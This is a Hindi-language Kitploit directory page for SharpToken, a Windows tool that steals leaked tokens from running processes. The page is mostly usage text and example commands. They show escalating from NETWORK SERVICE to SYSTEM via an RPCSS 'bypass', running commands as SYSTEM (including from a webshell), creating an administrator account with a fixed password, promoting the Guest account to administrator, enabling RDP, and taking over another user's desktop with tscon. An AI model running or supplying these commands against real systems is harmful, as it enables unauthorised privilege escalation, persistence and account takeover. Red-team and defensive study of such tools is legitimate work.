Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SharpToken — Windows टोकन चोरी और विशेषाधिकार वृद्धि उपकरण जो प्रक्रियाओं से लीक हुए टोकन चुराता है, SYSTEM-स्तर पहुंच, उपयोगकर्ता प्रतिरूपण, और पासवर्ड के बिना डेस्कटॉप स्विचिंग सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/beichendream/sharptoken
विशेषाधिकार वृद्धिपार्श्व आंदोलनपोस्ट-शोषणरेड टीमिंग
GitHubbeichendream/sharptoken

SharpToken

Windows टोकन चोरी और विशेषाधिकार वृद्धि उपकरण जो प्रक्रियाओं से लीक हुए टोकन चुराता है, SYSTEM-स्तर पहुंच, उपयोगकर्ता प्रतिरूपण, और पासवर्ड के बिना डेस्कटॉप स्विचिंग सक्षम करता है।

रिपॉजिटरी देखें
496682 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SharpToken

रेड टीम लेटरल मूवमेंट के दौरान, हमें अक्सर अन्य उपयोगकर्ताओं की अनुमतियाँ चुराने की आवश्यकता होती है। आधुनिक EDR की सुरक्षा के तहत, हमारे लिए Mimikatz का उपयोग करके अन्य उपयोगकर्ता अनुमतियाँ प्राप्त करना कठिन है, और यदि लक्ष्य उपयोगकर्ता की कोई प्रक्रिया जीवित नहीं है, तो हमारे पास Token चुराने के लिए "OpenProcessToken" का उपयोग करने का कोई तरीका नहीं है।

SharpToken एक उपकरण है जो Token लीक का शोषण करने के लिए है। यह सिस्टम में सभी प्रक्रियाओं से लीक हुए Token ढूंढ सकता है और उनका उपयोग कर सकता है। यदि आप कम-विशेषाधिकार वाले सेवा उपयोगकर्ता हैं, तो आप इसका उपयोग "NT AUTHORITY\SYSTEM" विशेषाधिकारों में अपग्रेड करने के लिए भी कर सकते हैं, और आप लक्ष्य उपयोगकर्ता के पासवर्ड के बिना उसके डेस्कटॉप पर स्विच करके अधिक कार्य कर सकते हैं। ..

image

उपयोग

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Usage:

SharpToken COMMAND arguments



COMMANDS:

        list_token [process pid]        [bypass]

        list_all_token [process pid] [bypass]

        add_user    <username> <password> [group] [domain] [bypass]

        enableUser <username> <NewPassword> [NewGroup] [bypass]

        delete_user <username> [domain] [bypass]

        execute <tokenUser> <commandLine> [Interactive] [bypass]

        enableRDP [bypass]

        tscon <targetSessionId> [sourceSessionId] [bypass]


example:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1




उन्नत अनुमतियाँ

सामान्य Token चोरी विशेषाधिकार वृद्धि के अलावा, SharpToken Bypass के माध्यम से अखंडता (integrity) वाले Token प्राप्त करने का भी समर्थन करता है।

यदि आप NT AUTHORITY/NETWORK SERVICE उपयोगकर्ता हैं और आप bypass पैरामीटर जोड़ते हैं, तो SharpToken RPCSS से System चुराएगा, अर्थात बिना शर्त NT AUTHORITY\NETWORK SERVICE से NT AUTHORITY\SYSTEM में अपग्रेड।

image

टोकन सूची

गणना की गई जानकारी में SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (Duplicate के बाद Token का हैंडल), TargetProcessId (जिस प्रक्रिया से Token उत्पन्न होता है), TargetProcessToken (स्रोत प्रक्रिया में Token का हैंडल), Groups (जिस समूह में Token उपयोगकर्ता है) शामिल है।

root@kitploit:~
SharpToken list_token

image

निर्दिष्ट प्रक्रिया से टोकन गणना करें

root@kitploit:~
SharpToken list_token 468

image

इंटरैक्टिव शेल प्राप्त करें

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

कमांड निष्पादन परिणाम प्राप्त करें (वेबशेल के तहत निष्पादित)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

चुराए गए टोकन से एक व्यवस्थापक उपयोगकर्ता बनाएँ

root@kitploit:~

SharpToken add_user admin Abcd1234! Administrators

चुराए गए टोकन से एक व्यवस्थापक उपयोगकर्ता सक्षम करें

root@kitploit:~
    SharpToken enableUser Guest Abcd1234! Administrators

चुराए गए टोकन से एक उपयोगकर्ता हटाएँ

root@kitploit:~
    SharpToken delete_user admin

चुराए गए टोकन का उपयोग करके लक्ष्य के डेस्कटॉप पर स्विच करें

जहाँ 1 लक्ष्य उपयोगकर्ता का डेस्कटॉप है और 2 वह डेस्कटॉप है जिसे हम प्राप्त करना चाहते हैं

root@kitploit:~
    SharpToken tscon 1 2

लाइसेंस

GNU General Public License

संदर्भ

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

टूल डाउनलोड करें